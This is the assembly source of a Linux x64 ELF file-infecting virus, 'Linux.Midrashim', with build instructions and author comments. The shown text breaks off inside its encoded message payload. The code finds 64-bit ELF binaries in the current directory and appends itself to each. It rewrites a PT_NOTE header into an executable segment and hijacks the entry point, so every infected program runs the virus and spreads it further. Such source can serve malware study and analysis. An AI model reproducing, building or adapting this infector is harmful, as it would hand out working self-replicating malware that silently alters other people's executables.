Linux/Midrashim.A - x64 ELF infector - Source Code

1. ; Linux.Midrashim
2. ; Written by TMZ
3. ;
4. ; Finished on 30.05.2020
5. ; Released on 07.11.2020
6. ; The release was delayed because I was trying to code a fancy 90's style payload and due to lack of time, I'll leave this to another project.
7. ; This is my first full assembly virus and should be assembled with FASM x64 (tested with version 1.73.25 but it should work with more recent too).
8. ;   - relies on PT_NOTE -> PT_LOAD infection technique and should work on regular x64 ELF executables (position independent or not).
9. ;   - should use mmap but instead it uses pread and pwrite (due to lazyness).
10. ;   - stores stuff on memory buffer (r15 register).
11. ;   - infects current directory (non recursively).
12. ;   - has several parts that could have improved, like detecting first virus execution with a better approach.
13. ;
14. ; Assemble with:
15. ;       $ fasm Linux.Midrashim.asm
16. ;
17. ; Payload (non destructive) is a quote from a song and it's encoded for no reason whatsoever.
18. ;
19. ; A big thanks for those who keeps the VX scene alive!
20. ; Feel free to email me: tmz@null.net || tmz@syscall.sh || thomazi@linux.com
21. ; @guitmz || @TMZvx
22. ; https://www.guitmz.com
23. ; https://syscall.sh
24. ;
25. ; Use at your own risk, I'm not responsible for any damages that this may cause, do not spread it into the wild!
26. ;
27. ; References:
28. ; https://www.guitmz.com/linux-midrashim-elf-virus/
29. ; https://www.symbolcrash.com/2019/03/27/pt_note-to-pt_load-injection-in-elf
30. ; https://www.wikidata.org/wiki/Q6041496
31. ; https://legacyofkain.fandom.com/wiki/Ozar_Midrashim
32. ; https://en.wikipedia.org/wiki/Don%27t_Be_Afraid_(album)
33. ;
34. ; Stack buffer:
35. ; r15 + 0 = stack buffer (10000 bytes) = stat
36. ; r15 + 48 = stat.st_size
37. ; r15 + 144 = ehdr
38. ; r15 + 148 = ehdr.class
39. ; r15 + 152 = ehdr.pad
40. ; r15 + 168 = ehdr.entry
41. ; r15 + 176 = ehdr.phoff
42. ; r15 + 198 = ehdr.phentsize
43. ; r15 + 200 = ehdr.phnum
44. ; r15 + 208 = phdr = phdr.type
45. ; r15 + 212 = phdr.flags
46. ; r15 + 216 = phdr.offset
47. ; r15 + 224 = phdr.vaddr
48. ; r15 + 232 = phdr.paddr
49. ; r15 + 240 = phdr.filesz
50. ; r15 + 248 = phdr.memsz
51. ; r15 + 256 = phdr.align
52. ; r15 + 300 = jmp rel
53. ; r15 + 350 = directory size
54. ; r15 + 400 = dirent = dirent.d_ino
55. ; r15 + 416 = dirent.d_reclen
56. ; r15 + 418 = dirent.d_type
57. ; r15 + 419 = dirent.d_name
58. ; r15 + 3000 = first run control flag
59. ; r15 + 3001 = decoded payload
60.  
61. format ELF64 executable 3
62.  
63. SYS_EXIT        = 60
64. SYS_OPEN        = 2
65. SYS_CLOSE       = 3
66. SYS_WRITE       = 1
67. SYS_READ        = 0
68. SYS_EXECVE      = 59
69. SYS_GETDENTS64  = 217
70. SYS_FSTAT       = 5
71. SYS_LSEEK       = 8
72. SYS_PREAD64     = 17
73. SYS_PWRITE64    = 18
74. SYS_SYNC        = 162
75. STDOUT          = 1
76. EHDR_SIZE       = 64
77. ELFCLASS64      = 2
78. O_RDONLY        = 0
79. O_RDWR          = 2
80. SEEK_END        = 2
81. DIRENT_BUFSIZE  = 1024
82. MFD_CLOEXEC     = 1
83. DT_REG          = 8
84. PT_LOAD         = 1
85. PT_NOTE         = 4
86. PF_X            = 1
87. PF_R            = 4
88. FIRST_RUN       = 1
89. V_SIZE          = 2631
90.  
91. segment readable executable
92. entry v_start
93.  
94. v_start:
95.     mov r14, [rsp + 8]                                          ; saving argv0 to r14
96.     push rdx
97.     push rsp
98.     sub rsp, 5000                                               ; reserving 5000 bytes
99.     mov r15, rsp                                                ; r15 has the reserved stack buffer address
100.  
101.     check_first_run:
102.         mov rdi,  r14                                           ; argv0 to rdi
103.         mov rsi, O_RDONLY
104.         xor rdx, rdx                                            ; not using any flags
105.         mov rax, SYS_OPEN
106.         syscall                                                 ; rax contains the argv0 fd
107.  
108.         mov rdi, rax
109.         mov rsi, r15                                            ; rsi = r15 = stack buffer address
110.         mov rax, SYS_FSTAT                                      ; getting argv0 size in bytes
111.         syscall                                                 ; stat.st_size = [r15 + 48]
112.        
113.         cmp qword [r15 + 48], V_SIZE                            ; compare argv0 size with virus size
114.         jg load_dir                                             ; if greater, not first run, continue infecting without setting control flag
115.        
116.         mov byte [r15 + 3000], FIRST_RUN                        ; set the control flag to [r15 + 3000] to represent virus first execution, not a great approach but will do for now
117.  
118.     load_dir:
119.         push "."                                                ; pushing "." to stack (rsp)
120.         mov rdi, rsp                                            ; moving "." to rdi
121.         mov rsi, O_RDONLY
122.         xor rdx, rdx                                            ; not using any flags
123.         mov rax, SYS_OPEN
124.         syscall                                                 ; rax contains the fd
125.        
126.         pop rdi
127.         cmp rax, 0                                              ; if can't open file, exit now
128.         jbe v_stop
129.  
130.         mov rdi, rax                                            ; move fd to rdi
131.         lea rsi, [r15 + 400]                                    ; rsi = dirent = [r15 + 400]
132.         mov rdx, DIRENT_BUFSIZE                                 ; buffer with maximum directory size
133.         mov rax, SYS_GETDENTS64
134.         syscall                                                 ; dirent contains the directory entries
135.  
136.         test rax, rax                                           ; check directory list was successful
137.         js v_stop                                               ; if negative code is returned, I failed and should exit
138.  
139.         mov qword [r15 + 350], rax                              ; [r15 + 350] now holds directory size
140.  
141.         mov rax, SYS_CLOSE                                      ; close source fd in rdi
142.         syscall
143.  
144.         xor rcx, rcx                                            ; will be the position in the directory entries
145.  
146.     file_loop:
147.         push rcx                                                ; preserving rcx (important!!!)
148.         cmp byte [rcx + r15 + 418], DT_REG                      ; check if it's a regular file dirent.d_type = [r15 + 418]
149.         jne .continue                                           ; if not, proceed to next file
150.  
151.         .open_target_file:
152.             lea rdi, [rcx + r15 + 419]                          ; dirent.d_name = [r15 + 419]
153.             mov rsi, O_RDWR
154.             xor rdx, rdx                                        ; not using any flags
155.             mov rax, SYS_OPEN
156.             syscall
157.  
158.             cmp rax, 0                                          ; if can't open file, exit now
159.             jbe .continue
160.             mov r9, rax                                         ; r9 contains target fd
161.  
162.         .read_ehdr:
163.             mov rdi, r9                                         ; r9 contains fd
164.             lea rsi, [r15 + 144]                                ; rsi = ehdr = [r15 + 144]
165.             mov rdx, EHDR_SIZE                                  ; ehdr.size
166.             mov r10, 0                                          ; read at offset 0
167.             mov rax, SYS_PREAD64
168.             syscall
169.  
170.         .is_elf:
171.             cmp dword [r15 + 144], 0x464c457f                   ; 0x464c457f means .ELF (little-endian)
172.             jnz .close_file                                     ; not an ELF binary, close and continue to next file if any
173.        
174.         .is_64:
175.             cmp byte [r15 + 148], ELFCLASS64                    ; check if target ELF is 64bit
176.             jne .close_file                                     ; skipt it if not
177.  
178.         .is_infected:
179.             cmp dword [r15 + 152], 0x005a4d54                   ; check signature in [r15 + 152] ehdr.pad (TMZ in little-endian, plus trailing zero to fill up a word size)
180.             jz .close_file                                      ; already infected, close and continue to next file if any
181.  
182.             mov r8, [r15 + 176]                                 ; r8 now holds ehdr.phoff from [r15 + 176]
183.             xor rbx, rbx                                        ; initializing phdr loop counter in rbx
184.             xor r14, r14                                        ; r14 will hold phdr file offset
185.  
186.         .loop_phdr:
187.             mov rdi, r9                                         ; r9 contains fd
188.             lea rsi, [r15 + 208]                                ; rsi = phdr = [r15 + 208]
189.             mov dx, word [r15 + 198]                            ; ehdr.phentsize is at [r15 + 198]
190.             mov r10, r8                                         ; read at ehdr.phoff from r8 (incrementing ehdr.phentsize each loop iteraction)
191.             mov rax, SYS_PREAD64
192.             syscall
193.  
194.             cmp byte [r15 + 208], PT_NOTE                       ; check if phdr.type in [r15 + 208] is PT_NOTE (4)
195.             jz .infect                                          ; if yes, jackpot, start infecting
196.  
197.             inc rbx                                             ; if not, increase rbx counter
198.             cmp bx, word [r15 + 200]                            ; check if we looped through all phdrs already (ehdr.phnum = [r15 + 200])
199.             jge .close_file                                     ; exit if no valid phdr for infection was found
200.  
201.             add r8w, word [r15 + 198]                           ; otherwise, add current ehdr.phentsize from [r15 + 198] into r8w
202.             jnz .loop_phdr                                      ; read next phdr
203.  
204.         .infect:
205.             .get_target_phdr_file_offset:
206.                 mov ax, bx                                      ; loading phdr loop counter bx to ax
207.                 mov dx, word [r15 + 198]                        ; loading ehdr.phentsize from [r15 + 198] to dx
208.                 imul dx                                         ; bx * ehdr.phentsize
209.                 mov r14w, ax
210.                 add r14, [r15 + 176]                            ; r14 = ehdr.phoff + (bx * ehdr.phentsize)
211.  
212.             .file_info:
213.                 mov rdi, r9
214.                 mov rsi, r15                                    ; rsi = r15 = stack buffer address
215.                 mov rax, SYS_FSTAT
216.                 syscall                                         ; stat.st_size = [r15 + 48]
217.  
218.             .append_virus:
219.                 ; getting target EOF
220.                 mov rdi, r9                                     ; r9 contains fd
221.                 mov rsi, 0                                      ; seek offset 0
222.                 mov rdx, SEEK_END
223.                 mov rax, SYS_LSEEK
224.                 syscall                                         ; getting target EOF offset in rax
225.                 push rax                                        ; saving target EOF
226.  
227.                 call .delta                                     ; the age old trick
228.                 .delta:
229.                     pop rbp
230.                     sub rbp, .delta
231.  
232.                 ; writing virus body to EOF
233.                 mov rdi, r9                                     ; r9 contains fd
234.                 lea rsi, [rbp + v_start]                        ; loading v_start address in rsi
235.                 mov rdx, v_stop - v_start                       ; virus size
236.                 mov r10, rax                                    ; rax contains target EOF offset from previous syscall
237.                 mov rax, SYS_PWRITE64
238.                 syscall
239.  
240.                 cmp rax, 0
241.                 jbe .close_file
242.  
243.             .patch_phdr:
244.                 mov dword [r15 + 208], PT_LOAD                  ; change phdr type in [r15 + 208] from PT_NOTE to PT_LOAD (1)
245.                 mov dword [r15 + 212], PF_R or PF_X             ; change phdr.flags in [r15 + 212] to PF_X (1) | PF_R (4)
246.                 pop rax                                         ; restoring target EOF offeset into rax
247.                 mov [r15 + 216], rax                            ; phdr.offset [r15 + 216] = target EOF offset
248.                 mov r13, [r15 + 48]                             ; storing target stat.st_size from [r15 + 48] in r13
249.                 add r13, 0xc000000                              ; adding 0xc000000 to target file size
250.                 mov [r15 + 224], r13                            ; changing phdr.vaddr in [r15 + 224] to new one in r13 (stat.st_size + 0xc000000)
251.                 mov qword [r15 + 256], 0x200000                 ; set phdr.align in [r15 + 256] to 2mb
252.                 add qword [r15 + 240], v_stop - v_start + 5     ; add virus size to phdr.filesz in [r15 + 240] + 5 for the jmp to original ehdr.entry
253.                 add qword [r15 + 248], v_stop - v_start + 5     ; add virus size to phdr.memsz in [r15 + 248] + 5 for the jmp to original ehdr.entry
254.  
255.                 ; writing patched phdr
256.                 mov rdi, r9                                     ; r9 contains fd
257.                 mov rsi, r15                                    ; rsi = r15 = stack buffer address
258.                 lea rsi, [r15 + 208]                            ; rsi = phdr = [r15 + 208]
259.                 mov dx, word [r15 + 198]                        ; ehdr.phentsize from [r15 + 198]
260.                 mov r10, r14                                    ; phdr from [r15 + 208]
261.                 mov rax, SYS_PWRITE64
262.                 syscall
263.  
264.                 cmp rax, 0
265.                 jbe .close_file
266.  
267.             .patch_ehdr:
268.                 ; patching ehdr
269.                 mov r14, [r15 + 168]                            ; storing target original ehdr.entry from [r15 + 168] in r14
270.                 mov [r15 + 168], r13                            ; set ehdr.entry in [r15 + 168] to r13 (phdr.vaddr)
271.                 mov r13, 0x005a4d54                             ; loading virus signature into r13 (TMZ in little-endian)
272.                 mov [r15 + 152], r13                            ; adding the virus signature to ehdr.pad in [r15 + 152]
273.  
274.                 ; writing patched ehdr
275.                 mov rdi, r9                                     ; r9 contains fd
276.                 lea rsi, [r15 + 144]                            ; rsi = ehdr = [r15 + 144]
277.                 mov rdx, EHDR_SIZE                              ; ehdr.size
278.                 mov r10, 0                                      ; ehdr.offset
279.                 mov rax, SYS_PWRITE64
280.                 syscall
281.  
282.                 cmp rax, 0
283.                 jbe .close_file
284.  
285.             .write_patched_jmp:
286.                 ; getting target new EOF
287.                 mov rdi, r9                                     ; r9 contains fd
288.                 mov rsi, 0                                      ; seek offset 0
289.                 mov rdx, SEEK_END
290.                 mov rax, SYS_LSEEK
291.                 syscall                                         ; getting target EOF offset in rax
292.  
293.                 ; creating patched jmp
294.                 mov rdx, [r15 + 224]                            ; rdx = phdr.vaddr
295.                 add rdx, 5
296.                 sub r14, rdx
297.                 sub r14, v_stop - v_start
298.                 mov byte [r15 + 300 ], 0xe9
299.                 mov dword [r15 + 301], r14d
300.  
301.                 ; writing patched jmp to EOF
302.                 mov rdi, r9                                     ; r9 contains fd
303.                 lea rsi, [r15 + 300]                            ; rsi = patched jmp in stack buffer = [r15 + 208]
304.                 mov rdx, 5                                      ; size of jmp rel
305.                 mov r10, rax                                    ; mov rax to r10 = new target EOF
306.                 mov rax, SYS_PWRITE64
307.                 syscall
308.  
309.                 cmp rax, 0
310.                 jbe .close_file
311.  
312.                 mov rax, SYS_SYNC                               ; commiting filesystem caches to disk
313.                 syscall
314.  
315.         .close_file:
316.             mov rax, SYS_CLOSE                                  ; close source fd in rdi
317.             syscall
318.  
319.         .continue:
320.             pop rcx
321.             add cx, word [rcx + r15 + 416]                      ; adding directory record lenght to cx (lower rcx, for word)
322.             cmp rcx, qword [r15 + 350]                          ; comparing rcx counter with [r15 + 350] (directory records total size)
323.             jne file_loop                                       ; if counter is not the same, continue loop. Exit virus otherwise
324.  
325.     cmp byte [r15 + 3000], FIRST_RUN                            ; checking if custom control flag we set earlier indicates virus first execution
326.     jnz infected_run                                            ; if control flag != 1, it should be running from an infected file, use normal payload
327.         call show_msg                                           ; if control flag == 1, assume virus is being executed for the first time and display a different message
328.         info_msg:
329.             db 'Midrashim by TMZ (c) 2020', 0xa                 ; not the nicest approach like I mentioned before but quick to implement
330.             info_len = $-info_msg
331.         show_msg:            
332.             pop rsi                                             ; info_msg address to rsi
333.             mov rax, SYS_WRITE
334.             mov rdi, STDOUT                                     ; display payload
335.             mov rdx, info_len
336.             syscall
337.             jmp cleanup                                         ; cleanup and exit
338.  
339.     infected_run:
340.         ; 1337 encoded payload, very hax0r
341.         call payload
342.         msg:
343.             ; payload first part
344.             db 0x59, 0x7c, 0x95, 0x95, 0x57, 0x9e, 0x9d, 0x57
345.             db 0xa3, 0x9f, 0x92, 0x57, 0x93, 0x9e, 0xa8, 0xa3
346.             db 0x96, 0x9d, 0x98, 0x92, 0x57, 0x7e, 0x57, 0x98
347.             db 0x96, 0x9d, 0x57, 0xa8, 0x92, 0x92, 0x57, 0x96
348.             db 0x57, 0x9f, 0xa2, 0x94, 0x92, 0x57, 0x9f, 0x9c
349.             db 0x9b, 0x9c, 0x94, 0xa9, 0x96, 0xa7, 0x9f, 0x9e
350.             db 0x98, 0x57, 0x89, 0x9c, 0x9d, 0x96, 0x9b, 0x93
351.             db 0x57, 0x7a, 0x98, 0x73, 0x9c, 0x9d, 0x96, 0x9b
352.             db 0x93, 0x57, 0xa4, 0x96, 0x9b, 0xa0, 0x9e, 0x9d
353.             db 0x94, 0x57, 0x99, 0x92, 0xa3, 0xa4, 0x92, 0x92
354.             db 0x9d, 0x57, 0xa3, 0x9f, 0x92, 0x57, 0x94, 0xa9
355.             db 0x96, 0x9e, 0x9d, 0x57, 0x92, 0x9b, 0x92, 0xa5
356.             db 0x96, 0xa3, 0x9c, 0xa9, 0xa8, 0x57, 0x96, 0x9d
357.             db 0x93, 0x57, 0xa3, 0xa9, 0x92, 0x92, 0xa8, 0x41
358.             db 0x7c, 0x9f, 0x5b, 0x57, 0x9e, 0x95, 0x57, 0x7e
359.             db 0x57, 0x9f, 0x96, 0x93, 0x57, 0xa3, 0x9f, 0x92
360.             db 0x57, 0x9a, 0x9c, 0x9d, 0x92, 0xae, 0x57, 0x7e
361.             db 0x54, 0x93, 0x57, 0x9f, 0x96, 0xa5, 0x92, 0x57
362.             db 0x54, 0x92, 0x9a, 0x57, 0x9a, 0x96, 0xa0, 0x92
363.             db 0x57, 0x9c, 0x9d, 0x92, 0x57, 0x9c, 0x95, 0x57
364.             db 0xa3, 0x9f, 0x9c, 0xa8, 0x92, 0x57, 0x9a, 0x92
365.             db 0x5b, 0x57, 0xa3, 0x9f, 0x92, 0x9d, 0x57, 0x7e
366.             db 0x54, 0x93, 0x57, 0xa8, 0x92, 0x9d, 0x93, 0x57
367.             db 0x9a, 0xae, 0xa8, 0x92, 0x9b, 0x95, 0x57, 0xa3
368.             db 0x9c, 0x57, 0xa8, 0xa3, 0x96, 0x9b, 0xa0, 0x57
369.             db 0xa3, 0x9f, 0x92, 0x57, 0x9b, 0x96, 0x9d, 0x93
370.             db 0xa8, 0x98, 0x96, 0xa7, 0x92, 0x57, 0x96, 0x9d
371.             db 0x93, 0x57, 0xa8, 0x98, 0x96, 0xa9, 0x92, 0x57
372.             db 0x92, 0xa5, 0x92, 0xa9, 0xae, 0x99, 0x9c, 0x93
373.             db 0xae, 0x41, 0x8e, 0x9c, 0xa2, 0x57, 0xa8, 0x92
374.             db 0x92, 0x5b, 0x57, 0x54, 0x98, 0x96, 0xa2, 0xa8
375.             db 0x92, 0x57, 0x7e, 0x57, 0x94, 0x9c, 0xa3, 0x57
376.             db 0xa3, 0x9f, 0x9e, 0xa8, 0x57, 0xa8, 0x9c, 0xa9
377.             db 0xa3, 0x57, 0x9c, 0x95, 0x57, 0x95, 0x9e, 0x92
378.             db 0x9b, 0x93, 0x57, 0x99, 0x92, 0x9f, 0x9e, 0x9d
379.             db 0x93, 0x57, 0x9a, 0x92, 0x5d, 0x57, 0x79, 0x92
380.             db 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x5d, 0x5d, 0x5d
381.             db 0x57, 0x54, 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57
382.             db 0x7e, 0x54, 0xa5, 0x92, 0x57, 0x94, 0x9c, 0xa3
383.             db 0x57, 0xa8, 0xa7, 0x9e, 0xa0, 0x92, 0xa8, 0x41
384.             db 0x79, 0x92, 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57
385.             db 0x7e, 0x57, 0x94, 0x9c, 0x57, 0x99, 0x92, 0xa3
386.             db 0xa4, 0x92, 0x92, 0x9d, 0x57, 0xa3, 0x9f, 0x92
387.             db 0x57, 0xb1, 0x9c, 0x9d, 0x92, 0xa8, 0x5b, 0x57
388.             db 0x92, 0xa5, 0x92, 0x9d, 0x57, 0xa4, 0x9f, 0x92
389.             db 0x9d, 0x57, 0x7e, 0x54, 0x9a, 0x57, 0x9d, 0x9c
390.             db 0xa3, 0x57, 0xa8, 0xa2, 0xa7, 0xa7, 0x9c, 0xa8
391.             db 0x92, 0x93, 0x57, 0xa3, 0x9c, 0x41, 0x79, 0x92
392.             db 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57, 0x7e, 0x54
393.             db 0x9a, 0x57, 0x96, 0x57, 0xa8, 0xa2, 0xa8, 0xa7
394.             db 0x9e, 0x98, 0x9e, 0x9c, 0xa2, 0xa8, 0x57, 0xa7
395.             db 0x92, 0xa9, 0xa8, 0x9c, 0x9d, 0x57, 0xa9, 0x92
396.             db 0xa7, 0x9c, 0xa9, 0xa3, 0x57, 0x41, 0x76, 0x9d
397.             db 0x93, 0x57, 0x9e, 0xa3, 0x54, 0xa8, 0x57, 0xa3
398.             db 0x9e, 0x9a, 0x92, 0x57, 0xa3, 0x9c, 0x57, 0x94
399.             db 0x9c, 0x57, 0xa8, 0x9f, 0x9c, 0xa7, 0xa7, 0x9e
400.             db 0x9d, 0x94, 0x5d, 0x59, 0x41, 0x37, 0x41
401.             ; payload second part
402.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
403.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57
404.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
405.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55
406.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
407.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
408.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
409.             db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
410.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
411.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
412.             db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
413.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
414.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
415.             db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
416.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
417.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
418.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
419.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
420.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
421.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
422.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
423.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
424.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57
425.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
426.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
427.             db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
428.             db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
429.             db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
430.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
431.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
432.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55
433.             db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
434.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
435.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57
436.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57
437.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
438.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
439.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
440.             db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
441.             db 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57
442.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
443.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
444.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x58
445.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
446.             db 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
447.             db 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
448.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
449.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
450.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55
451.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
452.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55
453.             db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
454.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
455.             db 0x55, 0x55, 0x58, 0x57, 0x57, 0x57, 0x57, 0x41
456.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
457.             db 0x55, 0x55, 0x5d, 0x57, 0x57, 0x57, 0x57, 0x57
458.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57
459.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
460.             db 0x57, 0x57, 0x52, 0x55, 0x55, 0x55, 0x55, 0x55
461.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
462.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55
463.             db 0x55, 0x55, 0x55, 0x5d, 0x57, 0x57, 0x57, 0x57
464.             db 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x5d
465.             db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
466.             db 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57
467.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
468.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
469.             db 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
470.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
471.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
472.             db 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
473.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
474.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
475.             db 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55
476.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
477.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55
478.             db 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
479.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
480.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
481.             db 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55
482.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
483.             db 0x57, 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x55
484.             db 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
485.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
486.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
487.             db 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
488.             db 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55
489.             db 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57
490.             db 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57
491.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
492.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
493.             db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
494.             db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55
495.             db 0x55, 0x55, 0x52, 0x57, 0x57, 0x57, 0x57, 0x57
496.             db 0x57, 0x57, 0x61, 0x55, 0x55, 0x57, 0x57, 0x57
497.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
498.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
499.             db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
500.             db 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x55
501.             db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
502.             db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
503.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
504.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
505.             db 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
506.             db 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x55
507.             db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
508.             db 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57
509.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
510.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
511.             db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57
512.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
513.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
514.             db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
515.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41
516.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
517.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
518.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55
519.             db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57
